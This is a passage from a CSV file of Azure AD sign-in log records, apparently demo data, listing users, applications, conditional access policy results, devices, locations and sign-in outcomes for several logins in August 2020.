['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",011e8186-a783-421c-9de9-872062101400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,011e8186-a783-421c-9de9-872062101400,SigninLogs,Sucess,41.90428925,-85.99833679
+1211,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:39.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0f0f7cde-0357-4b3c-b141-6f4eef8973bb,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbcd7f19-25f4-4cfd-824c-94dcef291300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,cbcd7f19-25f4-4cfd-824c-94dcef291300,SigninLogs,Sucess,33.7984581,-84.38828278
+1212,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:10.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",ec6285b1-71d9-466f-b960-3898cf771e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ec6285b1-71d9-466f-b960-3898cf771e00,SigninLogs,Sucess,47.47483063,-122.1431198
+1213,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:50.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:57,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",a91a0573-2517-474b-9769-b4762a0a2300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a91a0573-2517-474b-9769-b4762a0a2300,SigninLogs,Sucess,47.47483063,-122.1431198
+1214,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:37.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4c1bcb6b-d65e-46e5-8a50-d530fcd4cf43,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",1fc6d415-116e-44c9-a4fc-b8ef261a1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,1fc6d415-116e-44c9-a4fc-b8ef261a1400,SigninLogs,Sucess,33.7984581,-84.38828278
+1215,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:58.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,26b91dc5-1547-4e35-ab0e-d553a668b2b5,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6849a433-22b7-4af4-99c8-beeeafd81600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6849a433-22b7-4af4-99c8-beeeafd81600,SigninLogs,Sucess,36.6404686,-78.26995087
+1216,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:02.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,cecd469f-10e5-0000-4780-a9a261c3bfe8,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",4445394f-bc55-4988-8502-680dde321600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,4445394f-bc55-4988-8502-680dde321600,SigninLogs,Failed,41.90428925,-85.99833679
+1217,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:37.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e26be625-26c8-4939-8b81-7496a2b9ca41,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a90d7024-2f24-4b85-b726-7a30e1f51400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,a90d7024-2f24-4b85-b726-7a30e1f51400,SigninLogs,Sucess,33.7984581,-84.38828278
+1218,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:55.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,baf3d9dc-03ce-441b-bfbd-549af488f279,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3c1797ce-9a4e-4e19-b7f0-81e01fdb1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3c1797ce-9a4e-4e19-b7f0-81e01fdb1300,SigninLogs,Sucess,33.7984581,-84.38828278
